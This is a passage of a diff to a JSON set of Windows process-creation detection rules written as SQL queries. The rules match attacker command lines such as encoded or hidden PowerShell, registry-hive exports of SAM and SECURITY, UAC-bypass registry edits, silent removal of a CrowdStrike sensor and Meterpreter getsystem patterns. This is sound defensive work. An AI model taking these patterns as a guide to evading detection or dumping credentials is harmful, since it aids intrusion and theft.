"attack.credential_access", + "attack.t1040" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% -en %' ESCAPE '\\' OR CommandLine LIKE '% -enc %' ESCAPE '\\' OR CommandLine LIKE '% -enco%' ESCAPE '\\' OR CommandLine LIKE '% -ec %' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% -Encoding %' ESCAPE '\\') OR ((ParentProcessName LIKE '%C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\gc\\_worker.exe%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\pktmon.exe' ESCAPE '\\' OR OriginalFileName = 'PktMon.exe'))" ], - "filename": "proc_creation_win_powershell_encode.yml" + "filename": "proc_creation_win_lolbin_pktmon.yml" }, { - "title": "Regsvr32 Flags Anomaly", - "id": "b236190c-1c61-41e9-84b3-3fe03f6d76b0", + "title": "XSL Script Processing", + "id": "05c36dd6-79d6-4a9a-97da-3db20298ab2d", "status": "test", - "description": "Detects a flag anomaly in which regsvr32.exe uses a /i flag without using a /n flag at the same time", - "author": "Florian Roth (Nextron Systems)", + "description": "Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. Rule detects when adversaries abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses.", + "author": "Timur Zinniatullin, oscd.community, Swachchhanda Shrawan Poudel", "tags": [ "attack.defense_evasion", - "attack.t1218.010" + "attack.t1220" ], "falsepositives": [ - "Unknown" + "WMIC.exe FP depend on scripts and administrative methods used in the monitored environment.", + "Msxsl.exe is not installed by default, so unlikely.", + "Static format arguments - https://petri.com/command-line-wmi-part-3" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '% /i:%' ESCAPE '\\') AND NOT (CommandLine LIKE '% /n %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' AND (CommandLine LIKE '%/format%' ESCAPE '\\' OR CommandLine LIKE '%-format%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%Format:List%' ESCAPE '\\' OR CommandLine LIKE '%Format:htable%' ESCAPE '\\' OR CommandLine LIKE '%Format:hform%' ESCAPE '\\' OR CommandLine LIKE '%Format:table%' ESCAPE '\\' OR CommandLine LIKE '%Format:mof%' ESCAPE '\\' OR CommandLine LIKE '%Format:value%' ESCAPE '\\' OR CommandLine LIKE '%Format:rawxml%' ESCAPE '\\' OR CommandLine LIKE '%Format:xml%' ESCAPE '\\' OR CommandLine LIKE '%Format:csv%' ESCAPE '\\'))) OR NewProcessName LIKE '%\\\\msxsl.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regsvr32_flags_anomaly.yml" + "filename": "proc_creation_win_wmic_xsl_script_processing.yml" }, { - "title": "Suspicious PowerShell Parameter Substring", - "id": "36210e0d-5b19-485d-a087-c096088885f0", - "status": "test", - "description": "Detects suspicious PowerShell invocation with a parameter substring", - "author": "Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix)", + "title": "Potential WMI Lateral Movement WmiPrvSE Spawned PowerShell", + "id": "692f0bec-83ba-4d04-af7e-e884a96059b6", + "status": "stable", + "description": "Detects Powershell as a child of the WmiPrvSE process. Which could be a sign of lateral movement via WMI.", + "author": "Markus Neis @Karneades", "tags": [ "attack.execution", + "attack.t1047", "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "AppvClient", + "CCM", + "WinRM" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '% -windowstyle h %' ESCAPE '\\' OR CommandLine LIKE '% -windowstyl h%' ESCAPE '\\' OR CommandLine LIKE '% -windowsty h%' ESCAPE '\\' OR CommandLine LIKE '% -windowst h%' ESCAPE '\\' OR CommandLine LIKE '% -windows h%' ESCAPE '\\' OR CommandLine LIKE '% -windo h%' ESCAPE '\\' OR CommandLine LIKE '% -wind h%' ESCAPE '\\' OR CommandLine LIKE '% -win h%' ESCAPE '\\' OR CommandLine LIKE '% -wi h%' ESCAPE '\\' OR CommandLine LIKE '% -win h %' ESCAPE '\\' OR CommandLine LIKE '% -win hi %' ESCAPE '\\' OR CommandLine LIKE '% -win hid %' ESCAPE '\\' OR CommandLine LIKE '% -win hidd %' ESCAPE '\\' OR CommandLine LIKE '% -win hidde %' ESCAPE '\\' OR CommandLine LIKE '% -NoPr %' ESCAPE '\\' OR CommandLine LIKE '% -NoPro %' ESCAPE '\\' OR CommandLine LIKE '% -NoProf %' ESCAPE '\\' OR CommandLine LIKE '% -NoProfi %' ESCAPE '\\' OR CommandLine LIKE '% -NoProfil %' ESCAPE '\\' OR CommandLine LIKE '% -nonin %' ESCAPE '\\' OR CommandLine LIKE '% -nonint %' ESCAPE '\\' OR CommandLine LIKE '% -noninte %' ESCAPE '\\' OR CommandLine LIKE '% -noninter %' ESCAPE '\\' OR CommandLine LIKE '% -nonintera %' ESCAPE '\\' OR CommandLine LIKE '% -noninterac %' ESCAPE '\\' OR CommandLine LIKE '% -noninteract %' ESCAPE '\\' OR CommandLine LIKE '% -noninteracti %' ESCAPE '\\' OR CommandLine LIKE '% -noninteractiv %' ESCAPE '\\' OR CommandLine LIKE '% -ec %' ESCAPE '\\' OR CommandLine LIKE '% -encodedComman %' ESCAPE '\\' OR CommandLine LIKE '% -encodedComma %' ESCAPE '\\' OR CommandLine LIKE '% -encodedComm %' ESCAPE '\\' OR CommandLine LIKE '% -encodedCom %' ESCAPE '\\' OR CommandLine LIKE '% -encodedCo %' ESCAPE '\\' OR CommandLine LIKE '% -encodedC %' ESCAPE '\\' OR CommandLine LIKE '% -encoded %' ESCAPE '\\' OR CommandLine LIKE '% -encode %' ESCAPE '\\' OR CommandLine LIKE '% -encod %' ESCAPE '\\' OR CommandLine LIKE '% -enco %' ESCAPE '\\' OR CommandLine LIKE '% -en %' ESCAPE '\\' OR CommandLine LIKE '% -executionpolic %' ESCAPE '\\' OR CommandLine LIKE '% -executionpoli %' ESCAPE '\\' OR CommandLine LIKE '% -executionpol %' ESCAPE '\\' OR CommandLine LIKE '% -executionpo %' ESCAPE '\\' OR CommandLine LIKE '% -executionp %' ESCAPE '\\' OR CommandLine LIKE '% -execution bypass%' ESCAPE '\\' OR CommandLine LIKE '% -executio bypass%' ESCAPE '\\' OR CommandLine LIKE '% -executi bypass%' ESCAPE '\\' OR CommandLine LIKE '% -execut bypass%' ESCAPE '\\' OR CommandLine LIKE '% -execu bypass%' ESCAPE '\\' OR CommandLine LIKE '% -exec bypass%' ESCAPE '\\' OR CommandLine LIKE '% -exe bypass%' ESCAPE '\\' OR CommandLine LIKE '% -ex bypass%' ESCAPE '\\' OR CommandLine LIKE '% -ep bypass%' ESCAPE '\\' OR CommandLine LIKE '% /windowstyle h %' ESCAPE '\\' OR CommandLine LIKE '% /windowstyl h%' ESCAPE '\\' OR CommandLine LIKE '% /windowsty h%' ESCAPE '\\' OR CommandLine LIKE '% /windowst h%' ESCAPE '\\' OR CommandLine LIKE '% /windows h%' ESCAPE '\\' OR CommandLine LIKE '% /windo h%' ESCAPE '\\' OR CommandLine LIKE '% /wind h%' ESCAPE '\\' OR CommandLine LIKE '% /win h%' ESCAPE '\\' OR CommandLine LIKE '% /wi h%' ESCAPE '\\' OR CommandLine LIKE '% /win h %' ESCAPE '\\' OR CommandLine LIKE '% /win hi %' ESCAPE '\\' OR CommandLine LIKE '% /win hid %' ESCAPE '\\' OR CommandLine LIKE '% /win hidd %' ESCAPE '\\' OR CommandLine LIKE '% /win hidde %' ESCAPE '\\' OR CommandLine LIKE '% /NoPr %' ESCAPE '\\' OR CommandLine LIKE '% /NoPro %' ESCAPE '\\' OR CommandLine LIKE '% /NoProf %' ESCAPE '\\' OR CommandLine LIKE '% /NoProfi %' ESCAPE '\\' OR CommandLine LIKE '% /NoProfil %' ESCAPE '\\' OR CommandLine LIKE '% /nonin %' ESCAPE '\\' OR CommandLine LIKE '% /nonint %' ESCAPE '\\' OR CommandLine LIKE '% /noninte %' ESCAPE '\\' OR CommandLine LIKE '% /noninter %' ESCAPE '\\' OR CommandLine LIKE '% /nonintera %' ESCAPE '\\' OR CommandLine LIKE '% /noninterac %' ESCAPE '\\' OR CommandLine LIKE '% /noninteract %' ESCAPE '\\' OR CommandLine LIKE '% /noninteracti %' ESCAPE '\\' OR CommandLine LIKE '% /noninteractiv %' ESCAPE '\\' OR CommandLine LIKE '% /ec %' ESCAPE '\\' OR CommandLine LIKE '% /encodedComman %' ESCAPE '\\' OR CommandLine LIKE '% /encodedComma %' ESCAPE '\\' OR CommandLine LIKE '% /encodedComm %' ESCAPE '\\' OR CommandLine LIKE '% /encodedCom %' ESCAPE '\\' OR CommandLine LIKE '% /encodedCo %' ESCAPE '\\' OR CommandLine LIKE '% /encodedC %' ESCAPE '\\' OR CommandLine LIKE '% /encoded %' ESCAPE '\\' OR CommandLine LIKE '% /encode %' ESCAPE '\\' OR CommandLine LIKE '% /encod %' ESCAPE '\\' OR CommandLine LIKE '% /enco %' ESCAPE '\\' OR CommandLine LIKE '% /en %' ESCAPE '\\' OR CommandLine LIKE '% /executionpolic %' ESCAPE '\\' OR CommandLine LIKE '% /executionpoli %' ESCAPE '\\' OR CommandLine LIKE '% /executionpol %' ESCAPE '\\' OR CommandLine LIKE '% /executionpo %' ESCAPE '\\' OR CommandLine LIKE '% /executionp %' ESCAPE '\\' OR CommandLine LIKE '% /execution bypass%' ESCAPE '\\' OR CommandLine LIKE '% /executio bypass%' ESCAPE '\\' OR CommandLine LIKE '% /executi bypass%' ESCAPE '\\' OR CommandLine LIKE '% /execut bypass%' ESCAPE '\\' OR CommandLine LIKE '% /execu bypass%' ESCAPE '\\' OR CommandLine LIKE '% /exec bypass%' ESCAPE '\\' OR CommandLine LIKE '% /exe bypass%' ESCAPE '\\' OR CommandLine LIKE '% /ex bypass%' ESCAPE '\\' OR CommandLine LIKE '% /ep bypass%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')))" ], - "filename": "proc_creation_win_powershell_susp_parameter_variation.yml" + "filename": "proc_creation_win_wmiprvse_spawns_powershell.yml" }, { - "title": "New Remote Desktop Connection Initiated Via Mstsc.EXE", - "id": "954f0af7-62dd-418f-b3df-a84bc2c7a774", - "status": "experimental", - "description": "Detects the usage of \"mstsc.exe\" with the \"/v\" flag to initiate a connection to a remote server.\nAdversaries may use valid accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.\n", - "author": "frack113", + "title": "Exports Registry Key To a File", + "id": "f0e53e89-8d22-46ea-9db5-9d4796ee2f8a", + "status": "test", + "description": "Detects the export of the target Registry key to a file.", + "author": "Oddvar Moe, Sander Wiebing, oscd.community", "tags": [ - "attack.lateral_movement", - "attack.t1021.001" + "attack.exfiltration", + "attack.t1012" ], "falsepositives": [ - "WSL (Windows Sub System For Linux)", - "Other currently unknown software" + "Legitimate export of keys" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\mstsc.exe' ESCAPE '\\' OR OriginalFileName = 'mstsc.exe') AND CommandLine LIKE '% /v:%' ESCAPE '\\') AND NOT ((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\lxss\\\\wslhost.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData\\\\Microsoft\\\\WSL\\\\wslg.rdp%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\regedit.exe' ESCAPE '\\' OR OriginalFileName = 'REGEDIT.EXE') AND (CommandLine LIKE '% /E %' ESCAPE '\\' OR CommandLine LIKE '% -E %' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%hklm%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_local\\_machine%' ESCAPE '\\')) AND ((CommandLine LIKE '%\\\\system' ESCAPE '\\' OR CommandLine LIKE '%\\\\sam' ESCAPE '\\' OR CommandLine LIKE '%\\\\security' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_mstsc_remote_connection.yml" + "filename": "proc_creation_win_regedit_export_keys.yml" }, { - "title": "Suspicious File Download via CertOC.exe", - "id": "70ad0861-d1fe-491c-a45f-fa48148a300d", - "status": "experimental", - "description": "Detects when a user downloads file by using CertOC.exe", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Reg Add Open Command", + "id": "dd3ee8cc-f751-41c9-ba53-5a32ed47e563", + "status": "test", + "description": "Threat actors performed dumping of SAM, SECURITY and SYSTEM registry hives using DelegateExecute key", + "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.credential_access", + "attack.t1003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR OriginalFileName = 'CertOC.exe') AND CommandLine LIKE '%-GetCACAPS%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%hkcu\\\\software\\\\classes\\\\ms-settings\\\\shell\\\\open\\\\command%' ESCAPE '\\' AND CommandLine LIKE '%/ve %' ESCAPE '\\' AND CommandLine LIKE '%/d%' ESCAPE '\\') OR (CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%hkcu\\\\software\\\\classes\\\\ms-settings\\\\shell\\\\open\\\\command%' ESCAPE '\\' AND CommandLine LIKE '%/v%' ESCAPE '\\' AND CommandLine LIKE '%DelegateExecute%' ESCAPE '\\') OR (CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%hkcu\\\\software\\\\classes\\\\ms-settings%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_certoc_download.yml" + "filename": "proc_creation_win_reg_open_command.yml" }, { - "title": "LOLBIN From Abnormal Drive", - "id": "d4ca7c59-e9e4-42d8-bf57-91a776efcb87", + "title": "GfxDownloadWrapper.exe Downloads File from Suspicious URL", + "id": "eee00933-a761-4cd0-be70-c42fe91731e7", "status": "test", - "description": "Detects LOLBINs executing from an abnormal drive such as a mounted ISO.", - "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", + "description": "Detects when GfxDownloadWrapper.exe downloads file from non standard URL", + "author": "Victor Sergeev, oscd.community", "tags": [ - "attack.t1218.001" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Rare false positives could occur on servers with multiple drives." + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\calc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\installutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\') AND NOT ((CurrentDirectory LIKE '%C:\\\\%' ESCAPE '\\' OR CurrentDirectory = '') OR (CurrentDirectory = '')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\GfxDownloadWrapper.exe' ESCAPE '\\' AND NOT (CommandLine LIKE '%gameplayapi.intel.com%' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\GfxDownloadWrapper.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\igfxEM.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_not_from_c_drive.yml" + "filename": "proc_creation_win_lolbin_gfxdownloadwrapper_file_download.yml" }, { - "title": "Start Windows Service Via Net.EXE", - "id": "2a072a96-a086-49fa-bcb5-15cc5a619093", + "title": "Uninstall Crowdstrike Falcon Sensor", + "id": "f0f7be61-9cf5-43be-9836-99d6ef448a18", "status": "test", - "description": "Detects the usage of the \"net.exe\" command to start a service using the \"start\" flag", - "author": "Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community", + "description": "Adversaries may disable security tools to avoid possible detection of their tools and activities by uninstalling Crowdstrike Falcon", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1569.002" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Legitimate administrator or user executes a service for legitimate reasons." + "Administrator might leverage the same command line for debugging or other purposes. However this action must be always investigated" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND CommandLine LIKE '% start %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\WindowsSensor.exe%' ESCAPE '\\' AND CommandLine LIKE '% /uninstall%' ESCAPE '\\' AND CommandLine LIKE '% /quiet%' ESCAPE '\\')" ], - "filename": "proc_creation_win_net_start_service.yml" + "filename": "proc_creation_win_uninstall_crowdstrike_falcon.yml" }, { - "title": "Suspicious Schtasks From Env Var Folder", - "id": "81325ce1-be01-4250-944f-b4789644556f", - "status": "experimental", - "description": "Detects Schtask creations that point to a suspicious folder or an environment variable often used by malware", - "author": "Florian Roth (Nextron Systems)", + "title": "Windows Admin Share Mount Via Net.EXE", + "id": "3abd6094-7027-475f-9630-8ab9be7b9725", + "status": "test", + "description": "Detects when an admin share is mounted using net.exe", + "author": "oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, wagga", "tags": [ - "attack.execution", - "attack.t1053.005" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ - "Benign scheduled tasks creations or executions that happen often during software installations", - "Software that uses the AppData folder and scheduled tasks to update the software in the AppData folders" + "Administrators" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /create %' ESCAPE '\\' AND (CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs%' ESCAPE '\\')) OR (ParentCommandLine LIKE '%\\\\svchost.exe -k netsvcs -p -s Schedule' ESCAPE '\\' AND (CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs%' ESCAPE '\\'))) AND NOT (((CommandLine LIKE '%update\\_task.xml%' ESCAPE '\\' OR CommandLine LIKE '%/Create /TN TVInstallRestore /TR%' ESCAPE '\\') OR ParentCommandLine LIKE '%unattended.ini%' ESCAPE '\\') OR (CommandLine LIKE '%/Create /Xml \"C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\.CR.%' ESCAPE '\\' AND CommandLine LIKE '%Avira\\_Security\\_Installation.xml%' ESCAPE '\\') OR (CommandLine LIKE '%/Create /F /TN%' ESCAPE '\\' AND CommandLine LIKE '%/Xml %' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\is-%' ESCAPE '\\' AND CommandLine LIKE '%Avira\\_%' ESCAPE '\\' AND (CommandLine LIKE '%.tmp\\\\UpdateFallbackTask.xml%' ESCAPE '\\' OR CommandLine LIKE '%.tmp\\\\WatchdogServiceControlManagerTimeout.xml%' ESCAPE '\\' OR CommandLine LIKE '%.tmp\\\\SystrayAutostart.xml%' ESCAPE '\\' OR CommandLine LIKE '%.tmp\\\\MaintenanceTask.xml%' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%/Create /TN \"klcp\\_update\" /XML %' ESCAPE '\\' AND CommandLine LIKE '%\\\\klcp\\_update\\_task.xml%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '% use %' ESCAPE '\\' AND CommandLine LIKE '% \\\\%\\\\%$%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_env_folder.yml" + "filename": "proc_creation_win_net_use_mount_admin_share.yml" }, { - "title": "Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBS", - "id": "07aa184a-870d-413d-893a-157f317f6f58", - "status": "test", - "description": "Detects execution of the built-in script located in \"C:\\Windows\\System32\\gatherNetworkInfo.vbs\". Which can be used to gather information about the target machine", + "title": "Suspicious New Instance Of An Office COM Object", + "id": "9bdaf1e9-fdef-443b-8081-4341b74a7e28", + "status": "experimental", + "description": "Detects an svchost process spawning an instance of an office application. This happens when the initial word application creates an instance of one of the Office COM objects such as 'Word.Application', 'Excel.Application', etc.\nThis can be used by malicious actors to create malicious Office documents with macros on the fly. (See vba2clr project in the references)\n", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", "attack.execution", - "attack.t1615", - "attack.t1059.005" + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Legitimate usage of office automation via scripting" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '%gatherNetworkInfo.vbs%' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\visio.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_gather_network_info_execution.yml" + "filename": "proc_creation_win_office_svchost_parent.yml" }, { - "title": "Suspicious RazerInstaller Explorer Subprocess", - "id": "a4eaf250-7dc1-4842-862a-5e71cd59a167", + "title": "UAC Bypass Using Consent and Comctl32 - Process", + "id": "1ca6bd18-0ba0-44ca-851c-92ed89a61085", "status": "test", - "description": "Detects a explorer.exe sub process of the RazerInstaller software which can be invoked from the installer to select a different installation folder but can also be exploited to escalate privileges to LOCAL SYSTEM", - "author": "Florian Roth (Nextron Systems), Maxime Thiebaut", + "description": "Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ + "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1553" + "attack.t1548.002" ], "falsepositives": [ - "User selecting a different installation folder (check for other sub processes of this explorer.exe process)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\RazerInstaller.exe' ESCAPE '\\' AND IntegrityLevel = 'System') AND NOT (NewProcessName LIKE 'C:\\\\Windows\\\\Installer\\\\Razer\\\\Installer\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\consent.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\werfault.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "proc_creation_win_exploit_other_razorinstaller_lpe.yml" + "filename": "proc_creation_win_uac_bypass_consent_comctl32.yml" }, { - "title": "Potential Meterpreter/CobaltStrike Activity", - "id": "15619216-e993-4721-b590-4c520615a67d", + "title": "Malicious Base64 Encoded PowerShell Keywords in Command Lines", + "id": "f26c6093-6f14-4b12-800f-0fcb46f5ffd0", "status": "test", - "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service starting", - "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", + "description": "Detects base64 encoded strings used in hidden malicious PowerShell command lines", + "author": "John Lambert (rule)", "tags": [ - "attack.privilege_escalation", - "attack.t1134.001", - "attack.t1134.002" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Commandlines containing components like cmd accidentally", - "Jobs and services started with cmd" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\' AND ((CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%echo%' ESCAPE '\\' AND CommandLine LIKE '%\\\\pipe\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%cmd%' ESCAPE '\\' OR CommandLine LIKE '%\\%COMSPEC\\%%' ESCAPE '\\')) OR (CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%.dll,a%' ESCAPE '\\' AND CommandLine LIKE '%/p:%' ESCAPE '\\'))) AND NOT ((CommandLine LIKE '%MpCmdRun%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '% hidden %' ESCAPE '\\' AND (CommandLine LIKE '%AGkAdABzAGEAZABtAGkAbgAgAC8AdAByAGEAbgBzAGYAZQByA%' ESCAPE '\\' OR CommandLine LIKE '%aXRzYWRtaW4gL3RyYW5zZmVy%' ESCAPE '\\' OR CommandLine LIKE '%IAaQB0AHMAYQBkAG0AaQBuACAALwB0AHIAYQBuAHMAZgBlAHIA%' ESCAPE '\\' OR CommandLine LIKE '%JpdHNhZG1pbiAvdHJhbnNmZX%' ESCAPE '\\' OR CommandLine LIKE '%YgBpAHQAcwBhAGQAbQBpAG4AIAAvAHQAcgBhAG4AcwBmAGUAcg%' ESCAPE '\\' OR CommandLine LIKE '%Yml0c2FkbWluIC90cmFuc2Zlc%' ESCAPE '\\' OR CommandLine LIKE '%AGMAaAB1AG4AawBfAHMAaQB6AGUA%' ESCAPE '\\' OR CommandLine LIKE '%JABjAGgAdQBuAGsAXwBzAGkAegBlA%' ESCAPE '\\' OR CommandLine LIKE '%JGNodW5rX3Npem%' ESCAPE '\\' OR CommandLine LIKE '%QAYwBoAHUAbgBrAF8AcwBpAHoAZQ%' ESCAPE '\\' OR CommandLine LIKE '%RjaHVua19zaXpl%' ESCAPE '\\' OR CommandLine LIKE '%Y2h1bmtfc2l6Z%' ESCAPE '\\' OR CommandLine LIKE '%AE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4A%' ESCAPE '\\' OR CommandLine LIKE '%kATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8Abg%' ESCAPE '\\' OR CommandLine LIKE '%lPLkNvbXByZXNzaW9u%' ESCAPE '\\' OR CommandLine LIKE '%SQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuA%' ESCAPE '\\' OR CommandLine LIKE 